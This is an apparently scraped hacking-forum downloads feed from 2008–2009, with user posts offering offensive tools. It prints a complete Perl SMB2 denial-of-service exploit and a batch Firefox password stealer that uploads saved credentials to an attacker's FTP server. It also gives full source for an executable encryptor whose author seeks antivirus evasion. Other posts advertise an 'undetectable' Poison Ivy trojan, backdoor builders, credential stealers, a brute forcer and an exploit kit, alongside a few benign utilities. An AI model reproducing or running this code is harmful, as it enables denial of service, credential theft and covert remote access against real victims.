Hacking Tools Downloads

Smb2 Nuke

Thu, 10 Sep 2009 02:28:20 +0000

you probably all have seen the python code making the rounds yesterday
i was to lazy to install python so i converted it to perl and assembly

http://illmob.org/smb2nuke.exe

peep the old skool winuke95 throwback gui
http://img35.imageshack.us/img35/8003/winnuke09.jpg

Quote

#!/usr/bin/perl
## smb2nuke by illwill
## translated to perl because i didnt feel like installing python
## Usage: smb2nuke.pl IPaddress (i.e. smb2nuke.pl 192.168.0.1)
####################################################################################
use IO::Socket;

$nuke = "\x00\x00\x00\x90".
"\xff\x53\x4d\x42".
"\x72\x00\x00\x00".
"\x00\x18\x53\xc8".
"\x00\x26".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe".
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54".
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31".
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00".
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57".
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61".
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c".
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c".
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e".
"\x30\x30\x32\x00";

print "->smb2nuke.pl<-$/$/";
print "-> Trying to Connect to $ARGV[0]:445$/";
$socket = IO::Socket::INET->new(
PeerAddr => "$ARGV[0]",
PeerPort => '445',
Proto => 'tcp',
Timeout => '45') or die "-!> Can't connect to $ARGV[0]:445 -> $!\r\n";
print "-> Connected to $ARGV[0]:445$/";
$socket->autoflush();

print $socket "$nuke";

print "-> Box should be nuked.$/"

Trace Any Process With Free Tool

Mon, 31 Aug 2009 22:29:04 +0000

Trace all your windows running processes, i.e what they do where connect , what they open and send:
Tool is free SO MODERATORS stop deleting my messages.
http://www.hotlinkfiles.com/files/2786572_fpyai/processmonitor26.zip
Best Regards
Nick Niceman

Batch2Exe

Thu, 27 Aug 2009 05:56:18 +0000

Okay, before anyone flames me ill say that i know this is offtopic, and if anyone knows where this should be, or if a mod can move this, i'd appreciate it.

But basically. I cant do anything. i cant even PM people. and i need this file very bad.

http://www.governmentsecurity.org/forum/index.php?showtopic=14767

help me please. and thank you.

Simple Flash dictionary maker

Fri, 22 May 2009 16:53:05 +0000

you just need a browser with Flash player: http://www.ddd.ee/dmaker/dmaker.html

Quick SAM/SYSTEM Stealer

Sat, 04 Apr 2009 11:17:35 +0000

I made a quick batch file which, when booted, will mount ntfs drives and steal the SAM and SYSTEM files. I used DOS stuff to make a memory stick bootable, used NTFS4DOS to mount the partitions and just plain COPY to copy the files. You can put this on a floppy (you will have to delete some files, it is a bit big) and boot it, all you need to do it type 'yes' when it asks. I timed this and it takes 28 seconds in total. You can then use the SAM and SYSTEM files it steals with CAIN to crack the users and passwords. It saves the file as SAM+drive letter it took it from (e.g SAMF if it came from the F:\ drive) It is the same with the SYSTEM file but with SYSTEM instead of SAM.

Comments please

STEALER.rar (1.29MB)
: 90

CUDA Mysql/Sha1 Cracker

Sat, 28 Mar 2009 20:35:51 +0000

Project overhauled, ATI support + mssql support done:)

So, i finally got around writing a CUDA Mysql/sha1/mssql hash cracker.
I'm releasing it here. Its free as in freedom You're NOT welcome to use this in any commercial products. Feel free to use this code in any free open source software tho

600mhashes/s on each 4870x2 in my system makes 2.4Bhashes/s on SHA1:)
There's one bug left, the NVIDIA version does not support plaintext lengths 1-3 properly, i might need some halp fixing this. I'm probably not going to spend too much time on this project for a while (Feel free to send me mail with an idea on how to fix this tho )

To compile the ATI kernel, you'll need to install my set of compiler hacks, because the ATI brook+ compiler is just plain shitty, and i didn't feel like copying my code 30+ times.

Todo:
-network support.
-more optimization
-some cleaning up

Binaries and source included.

If it's slow, feel free to mess around with it and recompile it:)

If it doesn't work: try installing nvidia's CUDA and ati's Brook+ (runtimes included now, so it SHOULD work.)

And yes i know i use smileys way too much.

Edit:

Made the ATI kernel compatible with newer versions of the driver. Fixed the NVIDIA kernel (uninitialized variable DATA1).

Edit:

Uploaded the wrong RAR file, included the wrong ATI kernel. fixed now.

Edit:

 430% increase in speed on NVIDIA, 50% increase on ATI. Pretty much all bugs fixed.

Edit:

 Added a minidump system. For those people that experience crashes, SEND MINIDUMPS.

Edit:

 Damn ATI for adding TLS for no reason in their SDK. It SHOULD REALLY REALLY BE FIXED NOW.

Edit:

Apperantly statically declared TLS caused a lot of bugs on operating systems lower than vista. Got that fixed now.

Edit:

Another bug fixed + nvidia code optimized a bit.

Edit:

Fixed a bug in the NVIDIA kernel, thanks to budden for reporting it. Also note: CUDA HATES UPX!

Edit:

I'd like to shoutout to: budden from the 3.14 forums, and darkwerewolf (my mentor).

Edit:

ATI support added. Project rewritten to modular layout. Code needs some cleaning up and optimisation now. MSSQL support added.

Edit:

Added -minlength and -maxlength commandline parameters.
			 
			 The commandline parameters are:
			 Set the output file : -outfile file.txt
			 Set the hash input file: -hashes file.txt
			 Set the charset file	: -charset file.txt
			 Set the min pass len :-minlength 10
		 
			 
			 And, if the hashes in the file are mysql hashes, specify the commandline option -mysql.
			 For mssql, set the commandline option -mssql.
		 
			 For the format of these files: The hash input file should be in the following format: HASH\r\n, so the file ends with a newline. See the archive for an example.
			 
			 The charset file should contain no newlines. Only a valid character set.

Edit:

Fixed a bug that would make the program unable to scan the last set of passwords of each block correctly. (Hackish fix, should be cleaned up later).

Edit:

Fixed a bug that would make the program unable to scan beyond 5 character passwords (am i going f'ing blind?).

Edit:

Multi GPU support added. Speed improved by approx 11%. Should work wonders on fast gpu's. Logging added. Send me some stats (mhashes/seconds) and logs!

releasecracker.zip (1.73MB)
: 14

Simple Backdoor

Wed, 18 Mar 2009 18:31:49 +0000

Here is a very simple backdoor i made. It uses Netcat for windows which is included in the zip. You run the Netcat.exe file on the victim computer. You need access to the computer to do this, If you want it to start on boot run the Netcat.reg file. The Netcat.exe file was written using autohotkey and the .ahk file is the source thing. THIS IS NOT UNDETECTABLE!!!! You will need to log onto the victims computer, copy the files to C:\WINDOWS\system32\ folder and add BOTH files to antivirus exceptions, possibly even firewall exceptions. The only files you need to copy are nc.exe and Netcat.exe. The reg file must be run if you want it to start on startup. The backdoor shows up in task manager as nc.exe but if you change the filename(and the ahk file(then compile it)) it will show up as different. To connect you can use telnet(or netcat) or Putty, port 303.

Please tell me what you think so i can improve it.

Backdoor.zip (224.83K)
: 117

Novas Radmin Brute Force Attack .NET v1.0

Sun, 11 Jan 2009 15:45:20 +0000

Novas Radmin Brute Force Attack .NET v1.0

Designed for use with radmin <= 2.0 it will attempt to connect and authenticate using passwords
contained in password.txt, on successful authentication the application will write the details
to a text file using the target as its filename. It does contain the ability to multithread
different IP's though testing produced varying results and advise against.

Prerequisites: .Net framework 3.

Wu-tang can (filtered) himself, don't steal others work for your glory! everyone else enjoy.
Distrubuted via governmentsecurity.org

nrbfNET.rar (448.03K)
: 334

DSplit GUI

Sat, 22 Nov 2008 06:29:49 +0000

I made a simple little GUI for DSplit, DSplit is included in the install but it has been renamed to dsp.exe you can replace my dsp.exe with your DSplit.exe but you will have to reanme it dsp.exe.
To use this all you have to do is click the buttons.
To pick the file that you want to split click the very open button then find the file you want to split.
Then when you have the program you want to split choose a project name. This will make a sub folder in the GUI folder so it will not flood your desktop or where ever you have the file you want to split.
then click Start Procedure and it will copy the dsp.exe and your file into that folder.
then you can change the values and click split.
if you do not want to just highlight and delete the extra files it makes you can use the Clear Folder it will delete everything in the folder with your permission but the backup in it will restore the file-to-split and the dsplit as long as the program is open so that is ok.
Sorry if this information is kind of bunched together it is currently 12:57 AM here and I am very tired.
Hope you like and please post comments.
P.S. The download link is the installer version(made with installsheild) of this.

http://www.youshare.com/Guest/dd8623e5c73f988d.zip.html

DosDrop 2.1

Tue, 11 Nov 2008 05:37:35 +0000

===========================================================
description: a program that drops the current folders' path
into a cmd prompt, works on nt/2k/xp/2k3
Vista gives you an "Elevated" Command Prompt
===========================================================
features:
*only 2.5kb

Instructions:
unzip the zipfile into a folder
open dosdrop.exe
BAM! ur done
now right click any folder and choose DOSDrop and it
will drop you to that folders path in a 'h4x0r-like'
command prompt. why? Because the matrix made black
and green consoles cool.
===========================================================

please let me know if any bugs , i don't have vista to test on
but it should work by giving you an elevated cmd prompt

DosDrop2.1.zip (1.25K)
: 63

C(ode) Injector v0.3

Sun, 12 Oct 2008 18:25:07 +0000

Hello Everyone,

this is my tool for injecting code to executables. Code to be injected ("stub") is written in C language. In the archive there is "stub_maker" directory with a framework for creating stubs. Just fill user_main() with your code and inject it to executable! Code in binary form will be then added to executable. No lame binding and shit.

This is one of first versions, so it is not stable yet. Read readme.txt first!!!!!!

I cannot upload anything ("Upload failed. Please ask the administrator to ensure the uploads directory is writeable").

Comments are welcome.

http://rapidshare.com/files/153364307/CodeInj.zip.html

EDIT: in getprocaddr.h file you have to comment out the line ' #include "mem.h" '

PE EXE encryptor in 200 lines of code (100% C++, 0% asm)

Sun, 05 Oct 2008 19:37:46 +0000

Hi,

I have written a simple PE EXE encryptor, that encrypts code section only. Decryptor routine is added to a "cave" in code section. If a "cave" is too small than executable won't be encrypted. In this version I'm using a lame encryption algorithm. This code is 100% C++ ( life is too short to code in assembler ).

I have a question to experts: Some files encrypted by a newer version of this encryptor (encryption of all sections, not only the code section) are detected as TR/Crypt.XPACK.Gen by Avira. Can you point me to some anti-detection techniques that will make encrypted file look 100% clean?

Any comments how to improve it?

I couldn't upload it as an attachment ("Upload failed. Please ask the administrator to ensure the uploads directory is writeable") - I attach src code in this post. Compile it with command "g++ -O1 main.cpp -o p.exe".

Cheers

---main.cpp------------------------------------------------------
/****************************************************************************

Project: PE EXE Encryptor
Version: 0.1
Author: [ my name was here ]
Date: 04.10.2008

Description:
Program encrypts code section of a windows executable with primitive
algorithm. Decryptor is added to a "cave" in code section.

*/

#include
#include
#include "pe_exe.h"

#define MASK_PTR 0xFFAABB01
#define MASK_SIZE 0xFFAABB02
#define MASK_OEP 0xFFAABB03

#define ERROR_NOT_AN_EXE -1
#define ERROR_CAVE_TOO_SMALL -2
#define ERROR_MASK_NOT_FOUND -3

#define MY_DEBUG

typedef unsigned int dword;

void decrypt(char *ptr, int size);

////////////////////////////////////////////////////////////////////////////////
// code of the decryption stub

void decrypt_start()
{
dword *ret;

dword PTR=MASK_PTR;
dword SIZE=MASK_SIZE;
decrypt((char*)PTR,(int)SIZE);

dword OEP=MASK_OEP;
ret=(dword*)&ret+2;
(*ret)=(dword)OEP;
}

void decrypt(char *ptr, int size)
{
for (int i=0; i ptr[i]=ptr[i]^0x13;
}

void decrypt_end() {}

////////////////////////////////////////////////////////////////////////////////
// encryption function

void encrypt(char *ptr, int size)
{
for (int i=0; i ptr[i]=ptr[i]^0x13;
}

////////////////////////////////////////////////////////////////////////////////
// replace a 32 bit mask in binary code with val, will work in 99% cases

bool replace_mask(dword codePtr, dword size, dword mask, dword val)
{
int i;
dword *ptr;
for (i=0; i ptr=(dword*)(codePtr+i);
if (*ptr==mask)
{
*ptr=val;
return true;
}
}
return false;
}

////////////////////////////////////////////////////////////////////////////////
// encrypt a pe exe in memory

int inject_code_mem(char *pe_image, int pe_size)
{
// check if the file is a valid pe executable
MZ_HEADER *mz_header;
mz_header=(MZ_HEADER*)pe_image;
if (mz_header->mz_id!=0x5a4d)
return 0;
PE_HEADER *pe_header;
pe_header=(PE_HEADER*)(pe_image+mz_header->mz_neptr);
if (pe_header->pe_id!=0x4550)
return ERROR_NOT_AN_EXE;

// offset to section table == offset to PE header + PE header size (0x18) + size of optional PE header
dword section_table_ptr=mz_header->mz_neptr+0x18+pe_header->pe_ntheadersize;

// search for code section in section table
PE_OBJENTRY *section;
PE_OBJENTRY *code_section;
for (int i=0; ipe_numofobjects; i++)
{
section=(PE_OBJENTRY*)(pe_image+section_table_ptr+i*sizeof(PE_OBJENTRY));
if ((section->oe_objectflags & 32) > 0) // 5th bit == 1 => section is executable
{
code_section=section;
break;
}
}

// check if there is some unused space in code section
int cave_size=code_section->oe_physsize-code_section->oe_virtsize;
int code_size=int(decrypt_end)-int(decrypt_start);
#ifdef MY_DEBUG
printf("cave_size=%d\n",cave_size);
printf("code_size=%d\n",code_size);
#endif
if (cave_size return ERROR_CAVE_TOO_SMALL;

// copy decompression stub to the exe file
char *ptr_dst=(char*)(pe_image+code_section->oe_physoffs+code_section->oe_virtsize);
char *ptr_src=(char*)decrypt_start;
for (int i=0; i ptr_dst[i]=ptr_src[i];

// replace binary masks in the decompressor - original entry point (MASK_OEP),
// pointer to encrypted code (MASK_PTR) and decompressor size (MASK_SIZE)
replace_mask((dword)ptr_dst,code_size,MASK_OEP,pe_header->pe_entrypointrva+pe_header->pe_imagebase);
replace_mask((dword)ptr_dst,code_size,MASK_PTR,code_section->oe_virtrva+pe_header->pe_imagebase);
replace_mask((dword)ptr_dst,code_size,MASK_SIZE,code_section->oe_virtsize);

// encrypt code section
encrypt((char*)(pe_image+code_section->oe_physoffs),code_section->oe_virtsize);

// fix entry point, virtual size of code section and make code section writable
pe_header->pe_entrypointrva=code_section->oe_virtrva+code_section->oe_virtsize;
code_section->oe_virtsize+=code_size;
code_section->oe_objectflags|=0x80000000; // make code section writable - bit 31

return 0;
}

bool encrypt_exe(char *name)
{
FILE *f;
f=fopen(name,"rb+");
if (f==NULL)
{
printf("Cannot open file %s\n",name);
return false;
}

fseek(f,0,SEEK_END);
int fsize=ftell(f);
fseek(f,0,SEEK_SET);
char *buf=new char[fsize];
fread(buf,fsize,1,f);
fseek(f,0,SEEK_SET);

int res=inject_code_mem(buf,fsize);
if (res>=0)
fwrite(buf,fsize,1,f);

delete [] buf;
fclose(f);
return res;
}

int main(int argc, char **argv)
{
if (argc<2)
{
printf("Usage: %s \n",argv[0]);
return 0;
}

encrypt_exe(argv[1]);

return 0;
}

---pe_exe.h---------------------------------------------------------------------------

////////x///////x///////x///////x///////x///////x///////x///////x///////x////

#ifndef __PE_HPP__
#define __PE_HPP__

//#pragma pack(push)
//#pragma pack(1)

typedef struct MZ_STRUCT
{
WORD mz_id;
WORD mz_last512;
WORD mz_num512;
WORD mz_relnum;
WORD mz_headersize;
WORD mz_minmem;
WORD mz_maxmem;
WORD mz_ss;
WORD mz_sp;
WORD mz_checksum;
WORD mz_ip;
WORD mz_cs;
WORD mz_relofs;
WORD mz_ovrnum;
BYTE mz_reserved[32];
DWORD mz_neptr;
} MZ_HEADER;

typedef struct PE_STRUCT
{
DWORD pe_id; // 00 01 02 03
WORD pe_cputype; // 04 05
WORD pe_numofobjects; // 06 07
DWORD pe_datetime; // 08 09 0A 0B
DWORD pe_coffptr; // 0C 0D 0E 0F
DWORD pe_coffsize; // 10 11 12 13
WORD pe_ntheadersize; // 14 15
WORD pe_flags; // 16 17
// NT_Header {
WORD pe_magic; // 18 19
BYTE pe_linkmajor; // 1A
BYTE pe_linkminor; // 1B
DWORD pe_sizeofcode; // 1C 1D 1E 1F
DWORD pe_sizeofidata; // 20 21 22 23
DWORD pe_sizeofudata; // 24 25 26 27
DWORD pe_entrypointrva; // 28 29 2A 2B
DWORD pe_baseofcode; // 2C 2D 2E 2F
DWORD pe_baseofdata; // 30 31 32 33
DWORD pe_imagebase; // 34 35 36 37
DWORD pe_objectalign; // 38 39 3A 3B
DWORD pe_filealign; // 3C 3D 3E 3F
WORD pe_osmajor; // 40 41
WORD pe_osminor; // 42 43
WORD pe_usermajor; // 44 45
WORD pe_userminor; // 46 47
WORD pe_subsysmajor; // 48 49
WORD pe_subsysminor; // 4A 4B
DWORD pe_reserved; // 4C 4D 4E 4F
DWORD pe_imagesize; // 50 51 52 53
DWORD pe_headersize; // 54 55 56 56
DWORD pe_checksum; // 58 59 5A 5B
WORD pe_subsystem; // 5C 5D
WORD pe_dllflags; // 5E 5F
DWORD pe_stackreserve; // 60 61 62 63
DWORD pe_stackcommit; // 64 65 66 67
DWORD pe_heapreserve; // 68 69 6A 6B
DWORD pe_heapcommit; // 6C 6D 6E 6F
DWORD pe_loaderflags; // 70 71 72 73
DWORD pe_numofrvaandsizes; // 74 75 76 77
// rva and sizes
DWORD pe_exportrva; // 78 79 7A 7B
DWORD pe_exportsize; // 7C 7D 7E 7F
DWORD pe_importrva; // 80 81 82 83
DWORD pe_importsize; // 84 85 86 87
DWORD pe_resourcerva; // 88 89 8A 8B
DWORD pe_resourcesize; // 8C 8D 8E 8F
DWORD pe_exceptionrva; // 90 91 92 93
DWORD pe_exceptionsize; // 94 95 96 97
DWORD pe_securityrva; // 98 99 9A 9B
DWORD pe_securitysize; // 9C 9D 9E 9F
DWORD pe_fixuprva; // A0 A1 A2 A3
DWORD pe_fixupsize; // A4 A5 A6 A7
DWORD pe_debugrva; // A8 A9 AA AB
DWORD pe_debugsize; // AC AD AE AF
DWORD pe_descriptionrva; // B0 B1 B2 B3
DWORD pe_descriptionsize; // B4 B5 B6 B7
DWORD pe_machinerva; // B8 B9 BA BB
DWORD pe_machinesize; // BC BD BE BF
DWORD pe_tlsrva; // C0 C1 C2 C3
DWORD pe_tlssize; // C4 C5 C6 C7
DWORD pe_loadconfigrva; // C8 C9 CA CB
DWORD pe_loadconfigsize; // CC CD CE CF
BYTE pe_reserved_1[8]; // D0 D1 D2 D3 D4 D5 D6 D7
DWORD pe_iatrva; // D8 D9 DA DB
DWORD pe_iatsize; // DC DD DE DF
BYTE pe_reserved_2[8]; // E0 E1 E2 E3 E4 E5 E6 E7
BYTE pe_reserved_3[8]; // E8 E9 EA EB EC ED EE EF
BYTE pe_reserved_4[8]; // F0 F1 F2 F3 F4 F5 F6 F7
// ---- total size == 0xF8 ---------
} PE_HEADER;

typedef struct PE_OBJENTRY_STRUCT
{
BYTE oe_name[8]; // 00 01 02 03 04 05 06 07
DWORD oe_virtsize; // 08 09 0A 0B
DWORD oe_virtrva; // 0C 0D 0E 0F
DWORD oe_physsize; // 10 11 12 13
DWORD oe_physoffs; // 14 15 16 17
BYTE oe_reserved[0x0C]; // 18 19 1A 1B 1C 1D 1E 1F 20 21 22 23
DWORD oe_objectflags; // 24 25 26 27
// ---- total size == 0x28 ---------
} PE_OBJENTRY;

typedef struct PE_EXPORT_STRUCT
{
DWORD ex_flags; // 00 01 02 03
DWORD ex_datetime; // 04 05 06 07
WORD ex_major_ver; // 08 09
WORD ex_minor_ver; // 0A 0B
DWORD ex_namerva; // 0C 0D 0E 0F
DWORD ex_ordinalbase; // 10 11 12 13
DWORD ex_numoffunctions; // 14 15 16 17
DWORD ex_numofnamepointers; // 18 19 1A 1B
DWORD ex_addresstablerva; // 1C 1D 1E 1F
DWORD ex_namepointersrva; // 20 21 22 23
DWORD ex_ordinaltablerva; // 24 25 26 27
// ---- total size == 0x28 ---------
} PE_EXPORT;

typedef struct PE_IMPORT_STRUCT
{
DWORD im_lookup; // 00
DWORD im_datetime; // 04 ?
DWORD im_forward; // 08 -1
DWORD im_name; // 0C
DWORD im_addresstable; // 10
// ---- total size == 0x14 ---------
} PE_IMPORT;

typedef struct PE_FIXUP_STRUCT
{
DWORD fx_pagerva; // 00 01 02 03
DWORD fx_blocksize; // 04 05 06 07
WORD fx_typeoffs[]; // 08 09 .. ..
} PE_FIXUP;

//#pragma pack(pop)

#endif // __PE_HPP__

////////x///////x///////x///////x///////x///////x///////x///////x///////x////

VBS to EXE

Sat, 13 Sep 2008 04:10:13 +0000

gives you the option to add icons and run as ghost or console app
http://www.f2ko.de/English/v2e/download.php

alternately if you dont feel like downloading the app you can also use a web interface
but limited to a 10 kb .vbs file

http://www.f2ko.de/ov2e/ov2e.html

Vbs To Exe

Vbs To Exe converts VBScript files into executables.
The created program executes the VBScript-code from memory using Ms-ScriptControl.
It hides the source of your Script-file.
Direct script execution is also possible.

NOTICE

The resulted program may not work correct. Some VBScript functions are not available.
You may test it for functionality.

http://www.f2ko.de/screenshots/v2e.png

Bat to EXE

Sat, 13 Sep 2008 04:06:44 +0000

gives you the option to add icons and run as ghost or console app
http://www.f2ko.de/English/b2e/download.php

alternately if you dont feel like downloading the app you can also use a web interface
but limitated to a 10 kb bat size and dont have the option to add icons

http://www.f2ko.de/ob2e/ob2e.html

http://www.f2ko.de/English/b2e/b2e.png

firefox.bat

Sun, 07 Sep 2008 06:37:26 +0000

i was bored while waiting for dinner

basically it takes the key3.db and signons3.txt and send to your ftp server
you can decode them a few ways:
1. create a new firefox profile and place the files in the profile directory
2. use firepassword http://securityxploded.com/firepassword.php
3. use passwordfox http://www.nirsoft.net/utils/passwordfox.zip

cls
@echo Firefox3 Pass Stealer
@echo Written by illwill
:: make sure you edit the ftpsite, user and pass 



echo off
PUSHD "%UserProfile%\Application Data\Mozilla\Firefox"
IF NOT ERRORLEVEL 1 FOR /F "tokens=2 delims==" %%A IN ('TYPE profiles.ini ^| FINDSTR.EXE /R /B /I /C:"Path="') DO SET Profile=%%~nxA
POPD
echo open SITENAME.COM>>c:\$.tmp
echo user USERNAME>>c:\$.tmp
echo PASSWORD>>c:\$.tmp
echo cd public_html>>c:\$.tmp
echo put "%UserProfile%\Application Data\Mozilla\Firefox\Profiles\%Profile%\signons3.txt">>c:\$.tmp
echo put "%UserProfile%\Application Data\Mozilla\Firefox\Profiles\%Profile%\key3.db">>c:\$.tmp
echo quit >>c:\$.tmp
ftp -v -i -n -s:c:\$.tmp
del c:\$.tmp

AOL Instant Messenger Password Decryptor

Sat, 30 Aug 2008 05:24:28 +0000

AIM 6.x (6.5 & beta 6.8) uses 2 algorithms to encrypt your AIM password. First the Blowfish algorithm is used to encrypt the AIM password using a 448 bit keyword.
The encrypted string is then encoded using base64 and stored in the registry at:
\\HKEY_CURRENT_USER\Software\America Online\AIM6\Passwords

From illmob.org

AIM Rape decodes these passwords then posts the user and decrypted password to a .php script on a remote server
all in a pretty 7.5kb executable

Download

Grendel Scanner

Thu, 14 Aug 2008 13:07:30 +0000

A web application security scanner recently presented @ defcon

http://www.grendel-scan.com/download.htm

Neosploit toolkit

Thu, 07 Aug 2008 00:07:06 +0000

The Neosploit toolkit is an advanced exploit framework to compromise web site visitors. It was written by "grabarz". It is unknown if this is a group or an individual. There's some information which suggests it is an individual.
It's not as popular as the Mpack toolkit but is gaining popularity steadily. It was written in the C language and is used as a CGI script. It can support multiple users from the same script. The exploit code will be the same from all users but the delivered executables can be different.

Similar to other toolkits this one provide various statistics too. Instead of using a database as the means to store them Neosploit uses several files with specific internal structures. The following information about the visitor is logged: Operating System, Web browser and its version, IP address, and the Referer.

Delivered exploit code is obfuscated using custom Javascript decoding function. The function name and all local variables are random in order to avoid detection by Network IDS. Often, several layers of obfuscation with anti-decoding tricks are used to deter the faint-hearted.

Toolkit's URL scheme is designed in such a way which will prohibit thecurious of obtaining the executables even if the same one is used from previous exploits.

Perhaps the reason for its slow adoption is its high price. It ranges, depending on version, from $1500 to $3000. Common version seen today in the wild is 1.5.x, with 2.0.x in beta mode. First detected version was 1.0.x

neosploit toolkit

passwd=infected

Scylla 1.0

Fri, 01 Aug 2008 14:09:55 +0000

Scylla v1.0b

Sometimes when you are exploiting a path traversal, you can't find a file, that could be frustrating.
Scylla will let you generate Triton xploits paths to scan for a target file in multiple locations.

You'll need java 1.6 to use it, so it will work in any box except for MacOS 10.4.9... sorry Gecko, this is the problem of depending of a monopoly http://www.angelwings.ws/aw/images/smilies/biggrin.gif

If you have any suggestion, bug reports, money, girlz or whatever PM me or send me a mail.

I hope you find this tool useful guys.

md5sum: 8cbf46a3a563bce13226dbba661fb551
sha1sum: ac4a0faad310658cd3dc603abe26a0bb391d2801

http://img516.imageshack.us/img516/3668/scyllato7.jpg

Quote

Scylla - Triton paths generator
Coded by APX, Buenos Aires 2008
th4 f00k1ng c0wb0ys c0d1ng t3am
apx.808 [@] gmail.com
http://apx808.blogspot.com

Contents:

1 - Intro
2 - Use
3 - Thanks
4 - Version history

[1 - Intro]

It's common in path traversal exploits to have problems
finding a file, httpd.conf anyone?
Well, the aim of this app it's to solve this issue.
Scylla will create a Triton exploit paths list to scan with
the different locations to search that you specify.

[2 - Use]

-Load the xploit data manually or using the "import" option
to import from a Triton exploit file.

-Add the tag "" to the place you want Scylla to add
the posible locations. Also, don't forget that Scylla won't make
the traversal, so you'll need to provide the ../ be it in your
locations file or in the xploit path field, the same happens with
the poison byte. YOU are the one who exploits, Scylla just will
make easier a repetitive task.

Example:

Xploit path: /cgi-bin/vuln.php?file=../../..%00

-Load a file with the posible locations of the file you are
looking for.

-Select a destination file.

-Push "generate".

-Now load the file with Triton and start scanning.

NOTE: Be careful how you use this because can be
VERY NOISY FOR THE LOGS.

Keep your simultaneos bots count low and
scan multiple sites if possible.

[3 - Thanks]

I would like to thanks Ange, Rudelgurke and my
fellow fooking cowboy Ex0rphine for your testing help.

[4 - Version History]

25-07-2008 - Project starts.

29-07-2008 - v1.0b starts being beta tested.

01-08-2008 - v1.0b Released to public.

EOF

You can download it from:

http://apx808.blogspot.com/2008/10/scylla-v10b.html

UD Poison Ivy Server

Fri, 18 Jul 2008 10:31:12 +0000

Bored, playing with new UD methods. Knock yourself out kiddies... (port 444) Injects into iexplorer.exe.

File Info

Report generated: 19.7.2008
Filename: server.exe
File size: 956 kb
PEiD: PEncrypt 3.1 Final -> junkcode [Overlay]
MD5 Hash: E2C2BEA0C07397F35111E6777DC01231
SHA1 Hash: EE01CE59FDE9785636E29B2665F1C783E2C33F65

Detections

A-Squared - Nothing found!
Antivir - Is the Trojan horse TR/Dropper.Gen
Avast - Nothing found!
AVG - Trojan horse BackDoor.PoisonIvy.AD
BitDefender - Nothing found!
ClamWin - Nothing found!
Comodo - Nothing found!
Dr.Web - Nothing found!
Ewido - Nothing found!
F-PROT 6 - Nothing found!
G DATA - Nothing found!
IkarusT3 - Nothing found!
Kaspersky - Nothing found!
McAfee - Nothing found!
Nod32 - Nothing found!
Norman - Nothing found!
Panda - Nothing found!
Sophos - Nothing found!
TrendMicro - Nothing found!
VBA32 - Nothing found!
Virus Buster - Nothing found!

Scan report generated by
NoVirusThanks.org

server.rar (498.72K)
: 195

Backdoor Maker

Wed, 25 Jun 2008 23:18:46 +0000

Well I made a backdoor maker for windows xp and vista.
It will create a standalone file that when you open it it will disable the windows firewall and then wait 20 seconds to start the backdoor.
Then it will add its self to the startup.
To log into it you will need crypt cat and the password that you set with the backdoor.
Here is a video on how to use it...
http://nz.youtube.com/watch?v=s3tauJ8Xu6s
Here is the download link sry wouldn't let me upload.
http://www.mediafire.com/download.php?uj9x4m4ek4j
Please rate the program.

sqlcmd

Fri, 20 Jun 2008 14:15:30 +0000

http://rapidshare.com/files/123808031/123C.rar

Azrael sqlCmd v 0.9 rc2
Azrael sqlCmd v 1.5
Azrael sqlCmd v 1.8

have fun

PHD Portable HTTP Debugger

Mon, 12 May 2008 16:56:51 +0000

I always wanted to use the same tools both in Win and Linux, that's why I decided to create this HTTP Debugger coded in Java.
This is the first version released to the public, so tell me about any bugs or improvements you would like to have in the app.

Be sure not to fook up the request if you touch it by hand, the app actually won't patch it or tell you about it, it will just send what you wrote.

To use it you need Java 1.6 Runtime.

Quote

To execute:
java -jar phd.jar

I should thanks a lot of people, but I would like to thanks specially
Rhino for his great tools and inspiration, Ex0rphine my fellow fooking
cowboy for his help with the code and beta testing, and to the beta testing
team, for helping me to polish this app, Falk0n, Lausbub, Zyrrox, thanks
a lot guys.

Hope you enjoy this tool and find it as useful as I do http://www.securibox.net/vbforum/images/smilies/smurf.gif

http://www.zshare.net/download/11869602856330d1/

This is the "manual", you can see it in the app, clicking in the skull too.

Quote

P.H.D. Portable HTTP Debugger
Coded by APX, Buenos Aires 2008
apx.808 [@] gmail.com

Contents:

1 - Intro
2 - Use
3 - Thanks
4 - Version history

[1 - Intro]

I needed a HTTP Debugger for my Linux box, and I couldn't find one,
I hate not being able to use the same tools both in my Win and Linux
boxes, so I decided to create a new HTTP Debugger based on Triton's
one.
The main idea was to create a simple to use, multiple platform HTTP
Debugger, and this is the result.

[2 - Use]

I wont explain how to use a HTTP Debugger, but I want to explain some
options you can find in the app.

* Remove response headers: Activating this checkbox, only the response
body will be shown.

* Log: You can save all the responses you get to a file.

* Save Selected: Select a text in the response and press this button to
save the selection to a file.

* View: This will create a temp file with the response body and will
open it in the default browser.

* Clean: Use it to clean the responses.

* Auto Clean: If selected the previous responses will be cleaned on each
request.

[3 - Thanks]

I should thanks a lot of people, but I would like to thanks specially
Rhino for his great tools and inspiration, Ex0rphine my fellow fooking
cowboy for his help with the code and beta testing, and to the beta testing
team, for helping me to polish this app, Falk0n, Lausbub, Zyrrox, thanks
a lot guys.

[4 - Version History]

28-04-2008 - Project starts.

01-05-2008 - v1.0 starts being beta tested

11-05-2008 - v1.1 released.

* Remembers last urls and posted data used.
* Auto Clean option added.
* Patched chunked replies.
* Start using non blocking socks.

Little SQLck (result) Filter !

Fri, 25 Apr 2008 13:37:17 +0000

hi there....

i submit a little helper that should do a nice work.
it filters your sqlck results from the ip-scan.txt (or what ever).

so if u found vulnerable machines in your network. you can exclude them easy for a new scan while u fix them
no more dublicates...

Remember -> Only for Educational proposes !!!

----------
USAGE:
----------

insox-filter.exe ip_input.txt results.txt
/\/\
-filtsox.exe does the same with more helping text.
-insox-filter.exe just do it console!

(the attachment function does not work)
so i decided to up it here

http://rapidshare.com/files/110298365/insox_filter-v2.2.rar

cheers

insox_filter_v2.2.rar (120.54K)
: 38

Creating Sfx File (if U Want To Run Ircd Example)

Mon, 21 Apr 2008 19:57:47 +0000

To configure the server: 
